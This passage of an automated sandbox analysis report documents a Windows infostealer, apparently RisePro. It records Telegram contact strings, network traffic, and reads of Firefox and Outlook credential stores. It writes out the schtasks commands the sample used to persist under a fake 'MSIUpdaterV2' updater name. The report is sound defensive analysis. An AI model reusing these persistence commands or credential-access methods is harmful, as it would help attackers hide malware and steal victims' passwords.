Source: file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.dr | String found in binary or memory: https://fonts.googleapis.com/css?family=Poppins%3A100%2C100italic%2C200%2C200italic%2C300%2C300itali
Source: file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.dr | String found in binary or memory: https://fonts.googleapis.com/css?family=Poppins%3A400%2C500%2C600%2C100%2C200%2C300%2C700%2C800%2C90
Source: file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.dr | String found in binary or memory: https://fonts.gstatic.com/
Source: file.exe, 00000000.00000002.3215228010.0000000001750000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3215228010.00000000017B5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ipinfo.io/
Source: file.exe, 00000000.00000002.3215228010.0000000001793000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ipinfo.io/Mozilla/5.0
Source: file.exe, 00000000.00000002.3214797936.0000000000BFD000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: https://ipinfo.io/https://www.maxmind.com/en/locate-my-ip-addressWs2_32.dll
Source: file.exe, 00000000.00000002.3215228010.0000000001787000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ipinfo.io/pt
Source: file.exe, 00000000.00000002.3215228010.0000000001793000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3215228010.0000000001769000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ipinfo.io/widget/demo/81.181.60.11
Source: file.exe, 00000000.00000002.3215228010.0000000001793000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ipinfo.io:443/widget/demo/81.181.60.11q
Source: file.exe, 00000000.00000003.2575663319.000000000632E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.dr | String found in binary or memory: https://panddamarketing.com/
Source: file.exe, 00000000.00000003.2577250291.00000000017E8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3215883795.0000000006321000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2601798968.0000000006320000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575692575.00000000017E8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575678526.0000000006325000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.dr | String found in binary or memory: https://schema.org
Source: file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.dr | String found in binary or memory: https://schema.org/WPFooter
Source: file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.dr | String found in binary or memory: https://schema.org/WPHeader
Source: file.exe | String found in binary or memory: https://sectigo.com/CPS0
Source: D87fZN3R3jFeplaces.sqlite.0.dr | String found in binary or memory: https://support.mozilla.org
Source: D87fZN3R3jFeplaces.sqlite.0.dr | String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: D87fZN3R3jFeplaces.sqlite.0.dr | String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL
Source: file.exe, 00000000.00000002.3215883795.00000000062D2000.00000004.00000020.00020000.00000000.sdmp, _LQmmrlytjrHiMTfplY7yVS.zip.0.dr | String found in binary or memory: https://t.me/RiseProSUPPORT
Source: file.exe, 00000000.00000002.3215228010.00000000017B5000.00000004.00000020.00020000.00000000.sdmp, passwords.txt.0.dr | String found in binary or memory: https://t.me/risepro_bot
Source: file.exe, 00000000.00000003.2085945219.00000000017AF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2086587679.00000000017AF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2086176899.00000000017B3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3215228010.00000000017B5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://t.me/risepro_botRomania
Source: file.exe, 00000000.00000003.2085945219.00000000017AF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2086587679.00000000017AF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2086176899.00000000017B3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://t.me/risepro_botisepro_bot0
Source: file.exe, 00000000.00000003.2084200905.0000000006308000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2079811279.0000000006304000.00000004.00000020.00020000.00000000.sdmp, XT01mi44PjK3Web Data.0.dr, 7Uefi7OpyFd1Web Data.0.dr, niRQM4iEj4A_Web Data.0.dr | String found in binary or memory: https://www.ecosia.org/newtab/
Source: file.exe, 00000000.00000003.2084200905.0000000006308000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2079811279.0000000006304000.00000004.00000020.00020000.00000000.sdmp, XT01mi44PjK3Web Data.0.dr, 7Uefi7OpyFd1Web Data.0.dr, niRQM4iEj4A_Web Data.0.dr | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.dr | String found in binary or memory: https://www.googletagmanager.com/gtag/js?id=G-EK6FYVCEFT%22%3E
Source: file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.dr | String found in binary or memory: https://www.instagram.com/easy2buydubai/
Source: D87fZN3R3jFeplaces.sqlite.0.dr | String found in binary or memory: https://www.mozilla.org
Source: D87fZN3R3jFeplaces.sqlite.0.dr | String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
Source: D87fZN3R3jFeplaces.sqlite.0.dr | String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
Source: file.exe, 00000000.00000003.2601798968.0000000006320000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2085945219.00000000017AF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3215883795.00000000062D2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2086587679.00000000017AF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2086176899.00000000017B3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3215228010.00000000017B5000.00000004.00000020.00020000.00000000.sdmp, Firefox_v6zchhhv.default-release.txt.0.dr | String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: file.exe, 00000000.00000003.2079094463.00000000062D2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2086865794.00000000062D2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2085601197.00000000062D2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3215883795.00000000062D2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2079536613.00000000062D2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2076251843.00000000062D2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084276163.00000000062D2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2083753605.00000000062D2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2086248971.00000000062D2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084541221.00000000062D2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2082948142.00000000062D2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2085232013.00000000062D2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2082172021.00000000062D2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078309451.00000000062D2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2086648084.00000000062D2000.00000004.00000020.00020000.00000000.sdmp, 3b6N2Xdh3CYwplaces.sqlite.0.dr, D87fZN3R3jFeplaces.sqlite.0.dr | String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: D87fZN3R3jFeplaces.sqlite.0.dr | String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: file.exe, 00000000.00000003.2079094463.00000000062D2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2086865794.00000000062D2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2085601197.00000000062D2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3215883795.00000000062D2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2079536613.00000000062D2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2076251843.00000000062D2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084276163.00000000062D2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2083753605.00000000062D2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2086248971.00000000062D2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084541221.00000000062D2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2082948142.00000000062D2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2085232013.00000000062D2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2082172021.00000000062D2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078309451.00000000062D2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2086648084.00000000062D2000.00000004.00000020.00020000.00000000.sdmp, 3b6N2Xdh3CYwplaces.sqlite.0.dr, D87fZN3R3jFeplaces.sqlite.0.dr | String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: file.exe, 00000000.00000003.2601798968.0000000006320000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2085945219.00000000017AF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2086587679.00000000017AF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2086176899.00000000017B3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3215228010.00000000017B5000.00000004.00000020.00020000.00000000.sdmp, Firefox_v6zchhhv.default-release.txt.0.dr | String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: file.exe, 00000000.00000003.2079094463.00000000062D2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2086865794.00000000062D2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2085601197.00000000062D2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3215883795.00000000062D2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2079536613.00000000062D2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2076251843.00000000062D2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084276163.00000000062D2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2083753605.00000000062D2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2086248971.00000000062D2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084541221.00000000062D2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2082948142.00000000062D2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2085232013.00000000062D2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2082172021.00000000062D2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078309451.00000000062D2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2086648084.00000000062D2000.00000004.00000020.00020000.00000000.sdmp, 3b6N2Xdh3CYwplaces.sqlite.0.dr, D87fZN3R3jFeplaces.sqlite.0.dr | String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: file.exe, 00000000.00000003.2601798968.0000000006320000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/privacy/firefox/p
Source: file.exe, 00000000.00000003.2085945219.00000000017AF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2086587679.00000000017AF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2086176899.00000000017B3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3215228010.00000000017B5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/privacy/firefox/tes_1
Source: file.exe, 00000000.00000003.2577250291.00000000017E8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3215883795.0000000006321000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2601798968.0000000006320000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575692575.00000000017E8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575678526.0000000006325000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.dr | String found in binary or memory: https://yoast.com/wordpress/plugins/seo/
Source: unknown | Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown | Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown | HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.75.166:443 -> 192.168.2.5:49708 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 185.199.220.53:443 -> 192.168.2.5:49722 version: TLS 1.2
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_06B9C230 SetThreadExecutionState,SetThreadExecutionState,CreateThread,CloseHandle,GetDesktopWindow,GetWindowRect,GetSystemMetrics,GetSystemMetrics,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,shutdown,closesocket,SetThreadDesktop,Sleep,GetCurrentThreadId,GetThreadDesktop,SetThreadDesktop,GetCurrentThreadId,GetThreadDesktop,BitBlt,DeleteObject,DeleteDC,ReleaseDC,Sleep,GetSystemMetrics,GetSystemMetrics,GetCurrentThreadId,GetThreadDesktop,SwitchDesktop,SetThreadDesktop,Sleep,Sleep,DeleteObject,DeleteDC,ReleaseDC
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_06B79080 OpenDesktopA,CreateDesktopA

                        System Summary

                        Source: file.exeStatic PE information: section name: .vmp\]
                        Source: file.exeStatic PE information: section name: .vmp\]
                        Source: file.exeStatic PE information: section name: .vmp\]
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06B7C480 CreateProcessAsUserA,CloseHandle,CloseHandle,WaitForSingleObject,GetExitCodeProcess,0_2_06B7C480
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B4A1800_2_00B4A180
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B245600_2_00B24560
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B9AC300_2_00B9AC30
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B3F0500_2_00B3F050
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BDF4800_2_00BDF480
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B21B900_2_00B21B90
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B442A00_2_00B442A0
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AE036F0_2_00AE036F
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AF47BF0_2_00AF47BF
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B5C80A0_2_00B5C80A
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ADA9280_2_00ADA928
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ADC9600_2_00ADC960
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B8EBA00_2_00B8EBA0
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AF8BB00_2_00AF8BB0
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BE6C500_2_00BE6C50
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AF8E300_2_00AF8E30
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B92F300_2_00B92F30
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AD71A00_2_00AD71A0
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B435900_2_00B43590
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ACF5800_2_00ACF580
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BE76900_2_00BE7690
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B8FBA00_2_00B8FBA0
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BE5D100_2_00BE5D10
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06B7A2300_2_06B7A230
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06B9C9900_2_06B9C990
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06B9D5400_2_06B9D540
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06B79A100_2_06B79A10
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06B83B600_2_06B83B60
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06B919800_2_06B91980
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06BBE63B0_2_06BBE63B
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06B7C7600_2_06B7C760
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06B824B00_2_06B824B0
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06BBE2DC0_2_06BBE2DC
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06B943700_2_06B94370
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06BCC0100_2_06BCC010
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06B98F600_2_06B98F60
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06B80B900_2_06B80B90
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06BC28400_2_06BC2840
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06BBE9990_2_06BBE999
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06B749100_2_06B74910
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06BD17140_2_06BD1714
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06BCF43E0_2_06BCF43E
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06B972F00_2_06B972F0
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06B7FE500_2_06B7FE50
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06BBDF9A0_2_06BBDF9A
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06B95AB00_2_06B95AB0
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06BB78800_2_06BB7880
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06B7F9D00_2_06B7F9D0
                        Source: C:\Users\user\Desktop\file.exeCode function: String function: 06BB6140 appears 58 times
                        Source: C:\Users\user\Desktop\file.exeCode function: String function: 00ABACE0 appears 64 times
                        Source: file.exeStatic PE information: invalid certificate
                        Source: file.exe, 00000000.00000000.1969129210.0000000001054000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilename$ vs file.exe
                        Source: file.exe, 00000000.00000002.3215072405.0000000001054000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilename$ vs file.exe
                        Source: file.exeBinary or memory string: OriginalFilename$ vs file.exe
                        Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                        Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@8/30@3/5
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CCA734 CreateToolhelp32Snapshot,RegOpenKeyExA,0_2_00CCA734
                        Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\yiaxs5ej.default\signons.sqliteJump to behavior
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5036:120:WilError_03
                        Source: C:\Users\user\Desktop\file.exeMutant created: \Sessions\1\BaseNamedObjects\slickSlideAnd2
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3184:120:WilError_03
                        Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\trixywEuxN9jQl5RTJump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                        Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                        Source: file.exe, 00000000.00000002.3214797936.0000000000BFD000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                        Source: file.exe, 00000000.00000002.3214797936.0000000000BFD000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: UPDATE %Q.%s SET sql = sqlite_rename_table(sql, %Q), tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
                        Source: file.exe, 00000000.00000003.2078285837.00000000062DA000.00000004.00000020.00020000.00000000.sdmp, hABmARFSHTPPLogin Data.0.dr, zIzhhVa_EL18Login Data For Account.0.dr, umz__9J7rRLfLogin Data.0.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                        Source: file.exeReversingLabs: Detection: 63%
                        Source: file.exeVirustotal: Detection: 57%
                        Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
                        Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\MSIUpdaterV2.exe" /tn "MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c HR" /sc HOURLY /rl HIGHEST
                        Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\MSIUpdaterV2.exe" /tn "MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c LG" /sc ONLOGON /rl HIGHEST
                        Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\MSIUpdaterV2.exe" /tn "MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c HR" /sc HOURLY /rl HIGHESTJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\MSIUpdaterV2.exe" /tn "MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c LG" /sc ONLOGON /rl HIGHESTJump to behavior
Source: C:\Users\user\Desktop\file.exe | Sections loaded (in load order): apphelp.dll, rstrtmgr.dll, ncrypt.dll, ntasn1.dll, d3d11.dll, dxgi.dll, resourcepolicyclient.dll, kernel.appcore.dll, d3d10warp.dll, uxtheme.dll, dxcore.dll, winhttp.dll, wininet.dll, mswsock.dll, devobj.dll, ondemandconnroutehelper.dll, webio.dll, iphlpapi.dll, winnsi.dll, sspicli.dll, dnsapi.dll, rasadhlp.dll, fwpuclnt.dll, schannel.dll, mskeyprotect.dll, ncryptsslp.dll, msasn1.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, gpapi.dll, windows.storage.dll, wldp.dll, vaultcli.dll, wintypes.dll, ntmarta.dll, dpapi.dll, windowscodecs.dll, iertutil.dll, profapi.dll, ondemandconnroutehelper.dll, urlmon.dll, srvcli.dll, netutils.dll, propsys.dll, linkinfo.dll, ntshrui.dll, cscapi.dll, edputil.dll, windows.staterepositoryps.dll, wintypes.dll, appresolver.dll, bcp47langs.dll, slc.dll, userenv.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll, d2d1.dll
Note on the load order: the TLS stack (winhttp.dll, wininet.dll, schannel.dll, ncryptsslp.dll) comes up before the credential APIs (vaultcli.dll for Credential Manager, dpapi.dll for DPAPI unprotect), which is consistent with the stealer signatures listed in the overview; d3d11.dll, dxgi.dll, d2d1.dll and windowscodecs.dll are the libraries a screenshot routine needs.
Source: C:\Windows\SysWOW64\schtasks.exe (each of the two schtasks.exe instances) | Sections loaded: kernel.appcore.dll, taskschd.dll, sspicli.dll, xmllite.dll
Source: EdgeMS2.lnk.0.dr | LNK file: ..\..\..\..\..\..\Local\Temp\EdgeMS2_c81e728d9d4c2f636f067f89cc14862c\EdgeMS2.exe
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 (the Outlook profile subkey that stores account settings; this is the registry access behind the "Tries to steal Mail credentials" signature)
Source: file.exe | Static PE information: Virtual size of .text is bigger than: 0x100000
Source: file.exe | Static file information: File size 3434744 > 1048576
Source: file.exe | Static PE information: Raw size of .vmp\] is bigger than: 0x100000 < 0x2fd000
